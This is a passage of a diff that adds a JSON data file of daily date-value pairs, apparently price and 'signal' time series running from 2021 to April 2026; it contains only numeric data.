+ [ + "2024-08-14", + 31.315725326538086 + ], + [ + "2024-08-15", + 33.67164993286133 + ], + [ + "2024-08-16", + 33.76018524169922 + ], + [ + "2024-08-19", + 35.06849670410156 + ], + [ + "2024-08-20", + 34.85208511352539 + ], + [ + "2024-08-21", + 35.329166412353516 + ], + [ + "2024-08-22", + 33.63230514526367 + ], + [ + "2024-08-23", + 34.689781188964844 + ], + [ + "2024-08-26", + 33.67164993286133 + ], + [ + "2024-08-27", + 33.95692825317383 + ], + [ + "2024-08-28", + 32.80601119995117 + ], + [ + "2024-08-29", + 32.63386154174805 + ], + [ + "2024-08-30", + 33.74542999267578 + ], + [ + "2024-09-03", + 30.666488647460938 + ], + [ + "2024-09-04", + 30.405811309814453 + ], + [ + "2024-09-05", + 30.504182815551758 + ], + [ + "2024-09-06", + 28.03020477294922 + ], + [ + "2024-09-09", + 29.072914123535156 + ], + [ + "2024-09-10", + 29.85494613647461 + ], + [ + "2024-09-11", + 31.758380889892578 + ], + [ + "2024-09-12", + 32.69780731201172 + ], + [ + "2024-09-13", + 33.125709533691406 + ], + [ + "2024-09-16", + 32.683048248291016 + ], + [ + "2024-09-17", + 32.70272445678711 + ], + [ + "2024-09-18", + 32.27482223510742 + ], + [ + "2024-09-19", + 34.7143669128418 + ], + [ + "2024-09-20", + 34.493038177490234 + ], + [ + "2024-09-23", + 34.74879455566406 + ], + [ + "2024-09-24", + 35.24064636230469 + ], + [ + "2024-09-25", + 35.36399459838867 + ], + [ + "2024-09-26", + 36.11400604248047 + ], + [ + "2024-09-27", + 35.49229049682617 + ], + [ + "2024-09-30", + 35.76860809326172 + ], + [ + "2024-10-01", + 34.253780364990234 + ], + [ + "2024-10-02", + 34.382076263427734 + ], + [ + "2024-10-03", + 34.303131103515625 + ], + [ + "2024-10-04", + 35.51203155517578 + ], + [ + "2024-10-07", + 34.34259796142578 + ], + [ + "2024-10-08", + 35.83275604248047 + ], + [ + "2024-10-09", + 36.69625473022461 + ], + [ + "2024-10-10", + 36.567962646484375 + ], + [ + "2024-10-11", + 36.66171646118164 + ], + [ + "2024-10-14", + 37.59922409057617 + ], + [ + "2024-10-15", + 36.09920883178711 + ], + [ + "2024-10-16", + 36.079471588134766 + ], + [ + "2024-10-17", + 36.18802261352539 + ], + [ + "2024-10-18", + 36.82947540283203 + ], + [ + "2024-10-21", + 37.03178787231445 + ], + [ + "2024-10-22", + 37.140342712402344 + ], + [ + "2024-10-23", + 35.4232063293457 + ], + [ + "2024-10-24", + 36.2669677734375 + ], + [ + "2024-10-25", + 36.878822326660156 + ], + [ + "2024-10-28", + 36.913360595703125 + ], + [ + "2024-10-29", + 37.934757232666016 + ], + [ + "2024-10-30", + 37.09099578857422 + ], + [ + "2024-10-31", + 34.268585205078125 + ], + [ + "2024-11-01", + 34.998863220214844 + ], + [ + "2024-11-04", + 34.67320251464844 + ], + [ + "2024-11-05", + 35.99065399169922 + ], + [ + "2024-11-06", + 38.911746978759766 + ], + [ + "2024-11-07", + 40.73249435424805 + ], + [ + "2024-11-08", + 40.831180572509766 + ], + [ + "2024-11-11", + 40.757164001464844 + ], + [ + "2024-11-12", + 40.53512191772461 + ], + [ + "2024-11-13", + 40.35749435424805 + ], + [ + "2024-11-14", + 39.50386047363281 + ], + [ + "2024-11-15", + 36.64691162109375 + ], + [ + "2024-11-18", + 37.38705062866211 + ], + [ + "2024-11-19", + 38.13706588745117 + ], + [ + "2024-11-20", + 38.092655181884766 + ], + [ + "2024-11-21", + 38.4676628112793 + ], + [ + "2024-11-22", + 38.610755920410156 + ], + [ + "2024-11-25", + 38.78839111328125 + ], + [ + "2024-11-26", + 39.3903694152832 + ], + [ + "2024-11-27", + 38.43806076049805 + ], + [ + "2024-11-29", + 39.41997528076172 + ], + [ + "2024-12-02", + 40.697959899902344 + ], + [ + "2024-12-03", + 41.058162689208984 + ], + [ + "2024-12-04", + 42.55818176269531 + ], + [ + "2024-12-05", + 42.20783996582031 + ], + [ + "2024-12-06", + 43.29338836669922 + ], + [ + "2024-12-09", + 42.2818603515625 + ], + [ + "2024-12-10", + 41.822975158691406 + ], + [ + "2024-12-11", + 44.058204650878906 + ], + [ + "2024-12-12", + 43.18483352661133 + ], + [ + "2024-12-13", + 44.11247634887695 + ], + [ + "2024-12-16", + 46.031917572021484 + ], + [ + "2024-12-17", + 45.41512680053711 + ], + [ + "2024-12-18", + 40.50551986694336 + ], + [ + "2024-12-19", + 39.93313980102539 + ], + [ + "2024-12-20", + 40.96934509277344 + ], + [ + "2024-12-23", + 42.1104736328125 + ], + [ + "2024-12-24", + 43.7838020324707 + ], + [ + "2024-12-26", + 43.68973922729492 + ], + [ + "2024-12-27", + 41.91244888305664 + ], + [ + "2024-12-30", + 40.229217529296875 + ], + [ + "2024-12-31", + 39.174720764160156 + ], + [ + "2025-01-02", + 38.92718505859375 + ], + [ + "2025-01-03", + 40.7935905456543 + ], + [ + "2025-01-06", + 42.184730529785156 + ], + [ + "2025-01-07", + 39.912376403808594 + ], + [ + "2025-01-08", + 39.94207763671875 + ], + [ + "2025-01-10", + 38.03606414794922 + ], + [ + "2025-01-13", + 37.640010833740234 + ], + [ + "2025-01-14", + 37.506343841552734 + ], + [ + "2025-01-15", + 40.04108810424805 + ], + [ + "2025-01-16", + 39.22422790527344 + ], + [ + "2025-01-17", + 41.15994644165039 + ], + [ + "2025-01-21", + 41.8431396484375 + ], + [ + "2025-01-22", + 43.46696090698242 + ], + [ + "2025-01-23", + 43.73429870605469 + ], + [ + "2025-01-24", + 42.947139739990234 + ], + [ + "2025-01-27", + 39.17967224121094 + ], + [ + "2025-01-28", + 40.917362213134766 + ], + [ + "2025-01-29", + 40.66487503051758 + ], + [ + "2025-01-30", + 41.1747932434082 + ], + [ + "2025-01-31", + 40.9520149230957 + ], + [ + "2025-02-03", + 39.961875915527344 + ], + [ + "2025-02-04", + 41.41242980957031 + ], + [ + "2025-02-05", + 41.95205307006836 + ], + [ + "2025-02-06", + 42.58078384399414 + ], + [ + "2025-02-07", + 40.956966400146484 + ], + [ + "2025-02-10", + 42.39761734008789 + ], + [ + "2025-02-11", + 42.095619201660156 + ], + [ + "2025-02-12", + 42.179786682128906 + ], + [ + "2025-02-13", + 43.95707702636719 + ], + [ + "2025-02-14", + 44.47194290161133 + ], + [ + "2025-02-18", + 44.74918746948242 + ], + [ + "2025-02-19", + 44.75413513183594 + ], + [ + "2025-02-20", + 44.20956039428711 + ], + [ + "2025-02-21", + 41.44213104248047 + ], + [ + "2025-02-24", + 39.95197296142578 + ], + [ + "2025-02-25", + 38.42716979980469 + ], + [ + "2025-02-26", + 38.67470169067383 + ], + [ + "2025-02-27", + 35.4666633605957 + ], + [ + "2025-02-28", + 37.090484619140625 + ], + [ + "2025-03-03", + 34.69435119628906 + ], + [ + "2025-03-04", + 34.31315612792969 + ], + [ + "2025-03-05", + 35.649837493896484 + ], + [ + "2025-03-06", + 32.69428253173828 + ], + [ + "2025-03-07", + 33.372528076171875 + ], + [ + "2025-03-10", + 29.610010147094727 + ], + [ + "2025-03-11", + 29.26346206665039 + ], + [ + "2025-03-12", + 30.263500213623047 + ], + [ + "2025-03-13", + 28.609973907470703 + ], + [ + "2025-03-14", + 30.63974952697754 + ], + [ + "2025-03-17", + 31.23383331298828 + ], + [ + "2025-03-18", + 29.659517288208008 + ], + [ + "2025-03-19", + 30.813024520874023 + ], + [ + "2025-03-20", + 30.49618148803711 + ], + [ + "2025-03-21", + 30.7833194732666 + ], + [ + "2025-03-24", + 32.73884201049805 + ], + [ + "2025-03-25", + 33.323020935058594 + ], + [ + "2025-03-26", + 31.469974517822266 + ], + [ + "2025-03-27", + 30.93372344970703 + ], + [ + "2025-03-28", + 28.47093963623047 + ], + [ + "2025-03-31", + 28.451082229614258 + ], + [ + "2025-04-01", + 29.10649871826172 + ], + [ + "2025-04-02", + 29.7569522857666 + ], + [ + "2025-04-03", + 24.97538185119629 + ], + [ + "2025-04-04", + 20.402353286743164 + ], + [ + "2025-04-07", + 20.481800079345703 + ], + [ + "2025-04-08", + 19.314956665039062 + ], + [ + "2025-04-09", + 26.122364044189453 + ], + [ + "2025-04-10", + 22.909822463989258 + ], + [ + "2025-04-11", + 24.121355056762695 + ], + [ + "2025-04-14", + 24.627811431884766 + ], + [ + "2025-04-15", + 24.72215461730957 + ], + [ + "2025-04-16", + 22.487773895263672 + ], + [ + "2025-04-17", + 22.42322540283203 + ], + [ + "2025-04-21", + 20.784683227539062 + ], + [ + "2025-04-22", + 22.373573303222656 + ], + [ + "2025-04-23", + 23.858190536499023 + ], + [ + "2025-04-24", + 25.888994216918945 + ], + [ + "2025-04-25", + 26.743022918701172 + ], + [ + "2025-04-28", + 26.723163604736328 + ], + [ + "2025-04-29", + 27.244516372680664 + ], + [ + "2025-04-30", + 27.249483108520508 + ], + [ + "2025-05-01", + 28.18792152404785 + ], + [ + "2025-05-02", + 29.508686065673828 + ], + [ + "2025-05-05", + 28.997262954711914 + ], + [ + "2025-05-06", + 28.17302703857422 + ], + [ + "2025-05-07", + 28.500734329223633 + ], + [ + "2025-05-08", + 29.34979820251465 + ], + [ + "2025-05-09", + 29.280284881591797 + ], + [ + "2025-05-12", + 32.825496673583984 + ], + [ + "2025-05-13", + 34.329978942871094 + ], + [ + "2025-05-14", + 34.93574142456055 + ], + [ + "2025-05-15", + 35.044979095458984 + ], + [ + "2025-05-16", + 35.476959228515625 + ], + [ + "2025-05-19", + 35.5713005065918 + ], + [ + "2025-05-20", + 35.19890213012695 + ], + [ + "2025-05-21", + 33.7341423034668 + ], + [ + "2025-05-22", + 33.907928466796875 + ], + [ + "2025-05-23", + 32.92976760864258 + ], + [ + "2025-05-27", + 35.223731994628906 + ], + [ + "2025-05-28", + 34.771888732910156 + ], + [ + "2025-05-29", + 34.94070816040039 + ], + [ + "2025-05-30", + 34.75699234008789 + ], + [ + "2025-06-02", + 35.55640411376953 + ], + [ + "2025-06-03", + 36.38560485839844 + ], + [ + "2025-06-04", + 36.67856216430664 + ], + [ + "2025-06-05", + 35.824527740478516 + ], + [ + "2025-06-06", + 36.84737777709961 + ], + [ + "2025-06-09", + 37.011234283447266 + ], + [ + "2025-06-10", + 37.72623825073242 + ], + [ + "2025-06-11", + 37.33893966674805 + ], + [ + "2025-06-12", + 37.58224105834961 + ], + [ + "2025-06-13", + 36.16217041015625 + ], + [ + "2025-06-16", + 37.63685607910156 + ], + [ + "2025-06-17", + 36.524635314941406 + ], + [ + "2025-06-18", + 36.474979400634766 + ], + [ + "2025-06-20", + 35.973487854003906 + ], + [ + "2025-06-23", + 37.09067153930664 + ], + [ + "2025-06-24", + 38.778873443603516 + ], + [ + "2025-06-25", + 39.076629638671875 + ], + [ + "2025-06-26", + 40.147151947021484 + ], + [ + "2025-06-27", + 40.54050827026367 + ], + [ + "2025-06-30", + 41.32721710205078 + ], + [ + "2025-07-01", + 40.276607513427734 + ], + [ + "2025-07-02", + 41.07826232910156 + ], + [ + "2025-07-03", + 42.228450775146484 + ], + [ + "2025-07-07", + 41.287384033203125 + ], + [ + "2025-07-08", + 41.34215545654297 + ], + [ + "2025-07-09", + 42.19857406616211 + ], + [ + "2025-07-10", + 42.004390716552734 + ], + [ + "2025-07-11", + 41.68572235107422 + ], + [ + "2025-07-14", + 42.12887191772461 + ], + [ + "2025-07-15", + 42.23841094970703 + ], + [ + "2025-07-16", + 42.35791015625 + ], + [ + "2025-07-17", + 43.343788146972656 + ], + [ + "2025-07-18", + 43.19441604614258 + ], + [ + "2025-07-21", + 43.851661682128906 + ], + [ + "2025-07-22", + 43.169517517089844 + ], + [ + "2025-07-23", + 43.737144470214844 + ], + [ + "2025-07-24", + 44.025936126708984 + ], + [ + "2025-07-25", + 44.2748908996582 + ], + [ + "2025-07-28", + 44.70808410644531 + ], + [ + "2025-07-29", + 44.50393295288086 + ], + [ + "2025-07-30", + 44.658294677734375 + ], + [ + "2025-07-31", + 43.9213752746582 + ], + [ + "2025-08-01", + 41.287384033203125 + ], + [ + "2025-08-04", + 43.547935485839844 + ], + [ + "2025-08-05", + 42.6417236328125 + ], + [ + "2025-08-06", + 44.23506164550781 + ], + [ + "2025-08-07", + 44.68318557739258 + ], + [ + "2025-08-08", + 45.88814926147461 + ], + [ + "2025-08-11", + 45.48483657836914 + ], + [ + "2025-08-12", + 47.16282272338867 + ], + [ + "2025-08-13", + 47.23252868652344 + ], + [ + "2025-08-14", + 47.10307312011719 + ], + [ + "2025-08-15", + 46.43586349487305 + ], + [ + "2025-08-18", + 46.37611389160156 + ], + [ + "2025-08-19", + 44.48401641845703 + ], + [ + "2025-08-20", + 43.67241287231445 + ], + [ + "2025-08-21", + 43.0649528503418 + ], + [ + "2025-08-22", + 45.001853942871094 + ], + [ + "2025-08-25", + 44.608497619628906 + ], + [ + "2025-08-26", + 45.1263313293457 + ], + [ + "2025-08-27", + 45.330482482910156 + ], + [ + "2025-08-28", + 46.15702819824219 + ], + [ + "2025-08-29", + 44.49397659301758 + ], + [ + "2025-09-02", + 43.358726501464844 + ], + [ + "2025-09-03", + 44.36949920654297 + ], + [ + "2025-09-04", + 45.569480895996094 + ], + [ + "2025-09-05", + 45.7188606262207 + ], + [ + "2025-09-08", + 46.371131896972656 + ], + [ + "2025-09-09", + 46.749549865722656 + ], + [ + "2025-09-10", + 46.799339294433594 + ], + [ + "2025-09-11", + 47.58605194091797 + ], + [ + "2025-09-12", + 48.1785774230957 + ], + [ + "2025-09-15", + 49.40843200683594 + ], + [ + "2025-09-16", + 49.27399444580078 + ], + [ + "2025-09-17", + 48.96030807495117 + ], + [ + "2025-09-18", + 50.27979278564453 + ], + [ + "2025-09-19", + 51.27562713623047 + ], + [ + "2025-09-22", + 52.142005920410156 + ], + [ + "2025-09-23", + 51.09139633178711 + ], + [ + "2025-09-24", + 50.54216766357422 + ], + [ + "2025-09-25", + 49.864349365234375 + ], + [ + "2025-09-26", + 50.46242141723633 + ], + [ + "2025-09-29", + 51.13525390625 + ], + [ + "2025-09-30", + 51.53396987915039 + ], + [ + "2025-10-01", + 52.261627197265625 + ], + [ + "2025-10-02", + 52.899566650390625 + ], + [ + "2025-10-03", + 52.18187713623047 + ], + [ + "2025-10-06", + 53.34812545776367 + ], + [ + "2025-10-07", + 52.485904693603516 + ], + [ + "2025-10-08", + 54.265167236328125 + ], + [ + "2025-10-09", + 54.05085754394531 + ], + [ + "2025-10-10", + 48.37913513183594 + ], + [ + "2025-10-13", + 51.44924545288086 + ], + [ + "2025-10-14", + 50.40261459350586 + ], + [ + "2025-10-15", + 51.434288024902344 + ], + [ + "2025-10-16", + 50.861141204833984 + ], + [ + "2025-10-17", + 51.82802200317383 + ], + [ + "2025-10-20", + 53.771759033203125 + ], + [ + "2025-10-21", + 53.71194839477539 + ], + [ + "2025-10-22", + 52.132041931152344 + ], + [ + "2025-10-23", + 53.437835693359375 + ], + [ + "2025-10-24", + 55.102474212646484 + ], + [ + "2025-10-27", + 58.02804946899414 + ], + [ + "2025-10-28", + 59.35377502441406 + ], + [ + "2025-10-29", + 60.11133575439453 + ], + [ + "2025-10-30", + 57.36019515991211 + ], + [ + "2025-10-31", + 58.17258071899414 + ], + [ + "2025-11-03", + 58.97001266479492 + ], + [ + "2025-11-04", + 55.361637115478516 + ], + [ + "2025-11-05", + 56.43817138671875 + ], + [ + "2025-11-06", + 53.27336502075195 + ], + [ + "2025-11-07", + 52.72014617919922 + ], + [ + "2025-11-10", + 56.17401885986328 + ], + [ + "2025-11-11", + 55.710514068603516 + ], + [ + "2025-11-12", + 55.59588623046875 + ], + [ + "2025-11-13", + 52.161949157714844 + ], + [ + "2025-11-14", + 52.20181655883789 + ], + [ + "2025-11-17", + 50.861141204833984 + ], + [ + "2025-11-18", + 49.022064208984375 + ], + [ + "2025-11-19", + 49.864349365234375 + ], + [ + "2025-11-20", + 46.30082702636719 + ], + [ + "2025-11-21", + 47.327518463134766 + ], + [ + "2025-11-24", + 50.91596221923828 + ], + [ + "2025-11-25", + 51.84297180175781 + ], + [ + "2025-11-26", + 53.198604583740234 + ], + [ + "2025-11-28", + 54.36484909057617 + ], + [ + "2025-12-01", + 53.87642288208008 + ], + [ + "2025-12-02", + 55.12240982055664 + ], + [ + "2025-12-03", + 55.51115417480469 + ], + [ + "2025-12-04", + 55.331729888916016 + ], + [ + "2025-12-05", + 55.96968078613281 + ], + [ + "2025-12-08", + 55.62080383300781 + ], + [ + "2025-12-09", + 55.83012771606445 + ], + [ + "2025-12-10", + 56.468074798583984 + ], + [ + "2025-12-11", + 55.9298095703125 + ], + [ + "2025-12-12", + 52.65037155151367 + ], + [ + "2025-12-15", + 51.852943420410156 + ], + [ + "2025-12-16", + 52.161949157714844 + ], + [ + "2025-12-17", + 49.241355895996094 + ], + [ + "2025-12-18", + 51.34457778930664 + ], + [ + "2025-12-19", + 53.34812545776367 + ], + [ + "2025-12-22", + 54.075782775878906 + ], + [ + "2025-12-23", + 54.833335876464844 + ], + [ + "2025-12-24", + 55.26862335205078 + ], + [ + "2025-12-26", + 55.21870422363281 + ], + [ + "2025-12-29", + 54.40005874633789 + ], + [ + "2025-12-30", + 54.01070022583008 + ], + [ + "2025-12-31", + 52.63298034667969 + ], + [ + "2026-01-02", + 52.263587951660156 + ], + [ + "2026-01-05", + 53.51152420043945 + ], + [ + "2026-01-06", + 54.91919708251953 + ], + [ + "2026-01-07", + 55.07893371582031 + ], + [ + "2026-01-08", + 54.10055160522461 + ], + [ + "2026-01-09", + 55.6679573059082 + ], + [ + "2026-01-12", + 55.79774475097656 + ], + [ + "2026-01-13", + 55.50822448730469 + ], + [ + "2026-01-14", + 53.74114990234375 + ], + [ + "2026-01-15", + 54.29024124145508 + ], + [ + "2026-01-16", + 54.05063247680664 + ], + [ + "2026-01-20", + 50.646263122558594 + ], + [ + "2026-01-21", + 52.64296340942383 + ], + [ + "2026-01-22", + 53.811031341552734 + ], + [ + "2026-01-23", + 54.29024124145508 + ], + [ + "2026-01-26", + 54.98908615112305 + ], + [ + "2026-01-27", + 56.44667434692383 + ], + [ + "2026-01-28", + 56.965816497802734 + ], + [ + "2026-01-29", + 55.9474983215332 + ], + [ + "2026-01-30", + 53.910865783691406 + ], + [ + "2026-02-02", + 55.00904846191406 + ], + [ + "2026-02-03", + 52.43330764770508 + ], + [ + "2026-02-04", + 49.67786407470703 + ], + [ + "2026-02-05", + 47.561363220214844 + ], + [ + "2026-02-06", + 50.50649642944336 + ], + [ + "2026-02-09", + 51.654598236083984 + ], + [ + "2026-02-10", + 50.93578338623047 + ], + [ + "2026-02-11", + 51.31515884399414 + ], + [ + "2026-02-12", + 48.18033981323242 + ], + [ + "2026-02-13", + 48.38999557495117 + ], + [ + "2026-02-17", + 48.27019119262695 + ], + [ + "2026-02-18", + 49.308475494384766 + ], + [ + "2026-02-19", + 48.7494010925293 + ], + [ + "2026-02-20", + 49.97737121582031 + ], + [ + "2026-02-23", + 48.16037368774414 + ], + [ + "2026-02-24", + 49.69783020019531 + ], + [ + "2026-02-25", + 51.78438186645508 + ], + [ + "2026-02-26", + 49.967384338378906 + ], + [ + "2026-02-27", + 49.438262939453125 + ], + [ + "2026-03-02", + 49.61796569824219 + ], + [ + "2026-03-03", + 48.02060317993164 + ], + [ + "2026-03-04", + 50.17703628540039 + ], + [ + "2026-03-05", + 49.717796325683594 + ], + [ + "2026-03-06", + 47.46152877807617 + ], + [ + "2026-03-09", + 49.308475494384766 + ], + [ + "2026-03-10", + 49.318458557128906 + ], + [ + "2026-03-11", + 49.26853942871094 + ], + [ + "2026-03-12", + 46.75270462036133 + ], + [ + "2026-03-13", + 45.85418701171875 + ], + [ + "2026-03-16", + 47.38166046142578 + ], + [ + "2026-03-17", + 48.08050537109375 + ], + [ + "2026-03-18", + 46.023902893066406 + ], + [ + "2026-03-19", + 45.61458206176758 + ], + [ + "2026-03-20", + 43.00889205932617 + ], + [ + "2026-03-23", + 44.496429443359375 + ], + [ + "2026-03-24", + 43.547996520996094 + ], + [ + "2026-03-25", + 44.38999938964844 + ], + [ + "2026-03-26", + 41.22999954223633 + ], + [ + "2026-03-27", + 38.779998779296875 + ], + [ + "2026-03-30", + 37.88999938964844 + ], + [ + "2026-03-31", + 41.68000030517578 + ], + [ + "2026-04-01", + 43.22999954223633 + ], + [ + "2026-04-02", + 43.33000183105469 + ], + [ + "2026-04-06", + 44.099998474121094 + ], + [ + "2026-04-07", + 44.150001525878906 + ], + [ + "2026-04-08", + 48.0 + ], + [ + "2026-04-09", + 48.959999084472656 + ], + [ + "2026-04-10", + 49.16999816894531 + ], + [ + "2026-04-13", + 50.65999984741211 + ], + [ + "2026-04-14", + 53.40999984741211 + ], + [ + "2026-04-15", + 55.650001525878906 + ], + [ + "2026-04-16", + 56.43000030517578 + ], + [ + "2026-04-17", + 58.59000015258789 + ], + [ + "2026-04-20", + 58.08000183105469 + ], + [ + "2026-04-21", + 57.400001525878906 + ], + [ + "2026-04-22", + 60.209999084472656 + ], + [ + "2026-04-23", + 59.220001220703125 + ] + ], + "signal": [ + [ + "2021-04-26", + 331.5280456542969 + ], + [ + "2021-04-27", + 330.0917663574219 + ], + [ + "2021-04-28", + 328.97576904296875 + ], + [ + "2021-04-29", + 330.1596984863281 + ], + [ + "2021-04-30", + 327.9956970214844 + ], + [ + "2021-05-03", + 326.2488708496094 + ], + [ + "2021-05-04", + 320.3778076171875 + ], + [ + "2021-05-05", + 319.3006896972656 + ], + [ + "2021-05-06", + 321.7072448730469 + ], + [ + "2021-05-07", + 324.31768798828125 + ], + [ + "2021-05-10", + 316.1272888183594 + ], + [ + "2021-05-11", + 315.6905822753906 + ], + [ + "2021-05-12", + 307.5196228027344 + ], + [ + "2021-05-13", + 309.8970642089844 + ], + [ + "2021-05-14", + 316.73870849609375 + ], + [ + "2021-05-17", + 314.81719970703125 + ], + [ + "2021-05-18", + 312.6920166015625 + ], + [ + "2021-05-19", + 313.051025390625 + ], + [ + "2021-05-20", + 319.1065673828125 + ], + [ + "2021-05-21", + 317.34039306640625 + ], + [ + "2021-05-24", + 322.677734375 + ], + [ + "2021-05-25", + 323.1241760253906 + ], + [ + "2021-05-26", + 324.249755859375 + ], + [ + "2021-05-27", + 323.0367736816406 + ], + [ + "2021-05-28", + 324.05572509765625 + ], + [ + "2021-06-01", + 322.97857666015625 + ], + [ + "2021-06-02", + 323.60931396484375 + ], + [ + "2021-06-03", + 320.2420349121094 + ], + [ + "2021-06-04", + 325.6763610839844 + ], + [ + "2021-06-07", + 326.6468200683594 + ], + [ + "2021-06-08", + 326.8020935058594 + ], + [ + "2021-06-09", + 326.87969970703125 + ], + [ + "2021-06-10", + 330.28582763671875 + ], + [ + "2021-06-11", + 331.1495056152344 + ], + [ + "2021-06-14", + 334.3229064941406 + ], + [ + "2021-06-15", + 332.13946533203125 + ], + [ + "2021-06-16", + 330.9263916015625 + ], + [ + "2021-06-17", + 335.1282958984375 + ], + [ + "2021-06-18", + 332.49847412109375 + ], + [ + "2021-06-21", + 334.5649108886719 + ], + [ + "2021-06-22", + 337.6837158203125 + ], + [ + "2021-06-23", + 337.84893798828125 + ], + [ + "2021-06-24", + 339.9377136230469 + ], + [ + "2021-06-25", + 339.5199279785156 + ], + [ + "2021-06-28", + 343.6490783691406 + ], + [ + "2021-06-29", + 344.8926086425781 + ], + [ + "2021-06-30", + 344.3485107421875 + ], + [ + "2021-07-01", + 344.4845275878906 + ], + [ + "2021-07-02", + 348.4388122558594 + ], + [ + "2021-07-06", + 349.9447326660156 + ], + [ + "2021-07-07", + 350.68310546875 + ], + [ + "2021-07-08", + 348.5650939941406 + ], + [ + "2021-07-09", + 350.7413330078125 + ], + [ + "2021-07-12", + 352.1112365722656 + ], + [ + "2021-07-13", + 352.1112365722656 + ], + [ + "2021-07-14", + 352.7427978515625 + ], + [ + "2021-07-15", + 350.2652893066406 + ], + [ + "2021-07-16", + 347.4284362792969 + ], + [ + "2021-07-19", + 344.58172607421875 + ], + [ + "2021-07-20", + 348.58453369140625 + ], + [ + "2021-07-21", + 351.2757263183594 + ], + [ + "2021-07-22", + 353.5978088378906 + ], + [ + "2021-07-23", + 357.72686767578125 + ], + [ + "2021-07-26", + 358.0086364746094 + ], + [ + "2021-07-27", + 354.0640869140625 + ], + [ + "2021-07-28", + 355.42431640625 + ], + [ + "2021-07-29", + 356.0558166503906 + ], + [ + "2021-07-30", + 354.20013427734375 + ], + [ + "2021-08-02", + 354.229248046875 + ], + [ + "2021-08-03", + 356.37640380859375 + ], + [ + "2021-08-04", + 356.8912658691406 + ], + [ + "2021-08-05", + 359.15509033203125 + ], + [ + "2021-08-06", + 357.5811462402344 + ], + [ + "2021-08-09", + 358.2418518066406 + ], + [ + "2021-08-10", + 356.4055480957031 + ], + [ + "2021-08-11", + 355.79345703125 + ], + [ + "2021-08-12", + 357.0758361816406 + ], + [ + "2021-08-13", + 358.3292541503906 + ], + [ + "2021-08-16", + 358.4847412109375 + ], + [ + "2021-08-17", + 355.3271789550781 + ], + [ + "2021-08-18", + 351.9071960449219 + ], + [ + "2021-08-19", + 353.607421875 + ], + [ + "2021-08-20", + 357.2702331542969 + ], + [ + "2021-08-23", + 362.61376953125 + ], + [ + "2021-08-24", + 363.72137451171875 + ], + [ + "2021-08-25", + 364.13909912109375 + ], + [ + "2021-08-26", + 361.8267822265625 + ], + [ + "2021-08-27", + 365.3439025878906 + ], + [ + "2021-08-30", + 369.44390869140625 + ], + [ + "2021-08-31", + 369.1426696777344 + ], + [ + "2021-09-01", + 369.7546081542969 + ], + [ + "2021-09-02", + 369.5798645019531 + ], + [ + "2021-09-03", + 370.71649169921875 + ], + [ + "2021-09-07", + 371.24114990234375 + ], + [ + "2021-09-08", + 369.9490661621094 + ], + [ + "2021-09-09", + 368.67626953125 + ], + [ + "2021-09-10", + 365.878173828125 + ], + [ + "2021-09-13", + 365.6255798339844 + ], + [ + "2021-09-14", + 364.5861511230469 + ], + [ + "2021-09-15", + 367.29669189453125 + ], + [ + "2021-09-16", + 367.54925537109375 + ], + [ + "2021-09-17", + 363.1966247558594 + ], + [ + "2021-09-20", + 355.69189453125 + ], + [ + "2021-09-21", + 356.1295471191406 + ], + [ + "2021-09-22", + 359.45599365234375 + ], + [ + "2021-09-23", + 362.772705078125 + ], + [ + "2021-09-24", + 363.1129455566406 + ], + [ + "2021-09-27", + 360.21466064453125 + ], + [ + "2021-09-28", + 350.0213928222656 + ], + [ + "2021-09-29", + 349.44757080078125 + ], + [ + "2021-09-30", + 348.1636962890625 + ], + [ + "2021-10-01", + 350.3229064941406 + ], + [ + "2021-10-04", + 342.9698181152344 + ], + [ + "2021-10-05", + 347.599609375 + ], + [ + "2021-10-06", + 349.826904296875 + ], + [ + "2021-10-07", + 353.0365905761719 + ], + [ + "2021-10-08", + 351.2761535644531 + ], + [ + "2021-10-11", + 348.5819396972656 + ], + [ + "2021-10-12", + 347.36614990234375 + ], + [ + "2021-10-13", + 350.14788818359375 + ], + [ + "2021-10-14", + 356.596435546875 + ], + [ + "2021-10-15", + 358.84320068359375 + ], + [ + "2021-10-18", + 362.4516906738281 + ], + [ + "2021-10-19", + 365.19451904296875 + ], + [ + "2021-10-20", + 364.71795654296875 + ], + [ + "2021-10-21", + 366.9451904296875 + ], + [ + "2021-10-22", + 363.86199951171875 + ], + [ + "2021-10-25", + 367.5871887207031 + ], + [ + "2021-10-26", + 368.7445983886719 + ], + [ + "2021-10-27", + 369.60052490234375 + ], + [ + "2021-10-28", + 373.705078125 + ], + [ + "2021-10-29", + 375.54327392578125 + ], + [ + "2021-11-01", + 376.8271789550781 + ], + [ + "2021-11-02", + 378.4028015136719 + ], + [ + "2021-11-03", + 382.4198303222656 + ], + [ + "2021-11-04", + 387.3219299316406 + ], + [ + "2021-11-05", + 387.6915283203125 + ], + [ + "2021-11-08", + 387.1662292480469 + ], + [ + "2021-11-09", + 384.5012512207031 + ], + [ + "2021-11-10", + 378.8503112792969 + ], + [ + "2021-11-11", + 379.9006652832031 + ], + [ + "2021-11-12", + 383.8982238769531 + ], + [ + "2021-11-15", + 383.8106689453125 + ], + [ + "2021-11-16", + 386.5437927246094 + ], + [ + "2021-11-17", + 386.7480773925781 + ], + [ + "2021-11-18", + 390.7552795410156 + ], + [ + "2021-11-19", + 392.93402099609375 + ], + [ + "2021-11-22", + 388.3722839355469 + ], + [ + "2021-11-23", + 386.6021728515625 + ], + [ + "2021-11-24", + 387.84710693359375 + ], + [ + "2021-11-26", + 380.4940185546875 + ], + [ + "2021-11-29", + 388.75164794921875 + ], + [ + "2021-11-30", + 383.04229736328125 + ], + [ + "2021-12-01", + 376.5257568359375 + ], + [ + "2021-12-02", + 379.2393493652344 + ], + [ + "2021-12-03", + 372.6448669433594 + ], + [ + "2021-12-06", + 375.630859375 + ], + [ + "2021-12-07", + 386.94256591796875 + ], + [ + "2021-12-08", + 388.673828125 + ], + [ + "2021-12-09", + 382.95477294921875 + ], + [ + "2021-12-10", + 387.1176452636719 + ], + [ + "2021-12-13", + 381.52496337890625 + ], + [ + "2021-12-14", + 377.57611083984375 + ], + [ + "2021-12-15", + 386.1839294433594 + ], + [ + "2021-12-16", + 376.2533264160156 + ], + [ + "2021-12-17", + 374.37615966796875 + ], + [ + "2021-12-20", + 370.74462890625 + ], + [ + "2021-12-21", + 379.0419921875 + ], + [ + "2021-12-22", + 383.65814208984375 + ], + [ + "2021-12-23", + 386.5505676269531 + ], + [ + "2021-12-27", + 392.939208984375 + ], + [ + "2021-12-28", + 391.11798095703125 + ], + [ + "2021-12-29", + 391.0596008300781 + ], + [ + "2021-12-30", + 389.89093017578125 + ], + [ + "2021-12-31", + 387.456298828125 + ], + [ + "2022-01-03", + 391.18621826171875 + ], + [ + "2022-01-04", + 386.1123046875 + 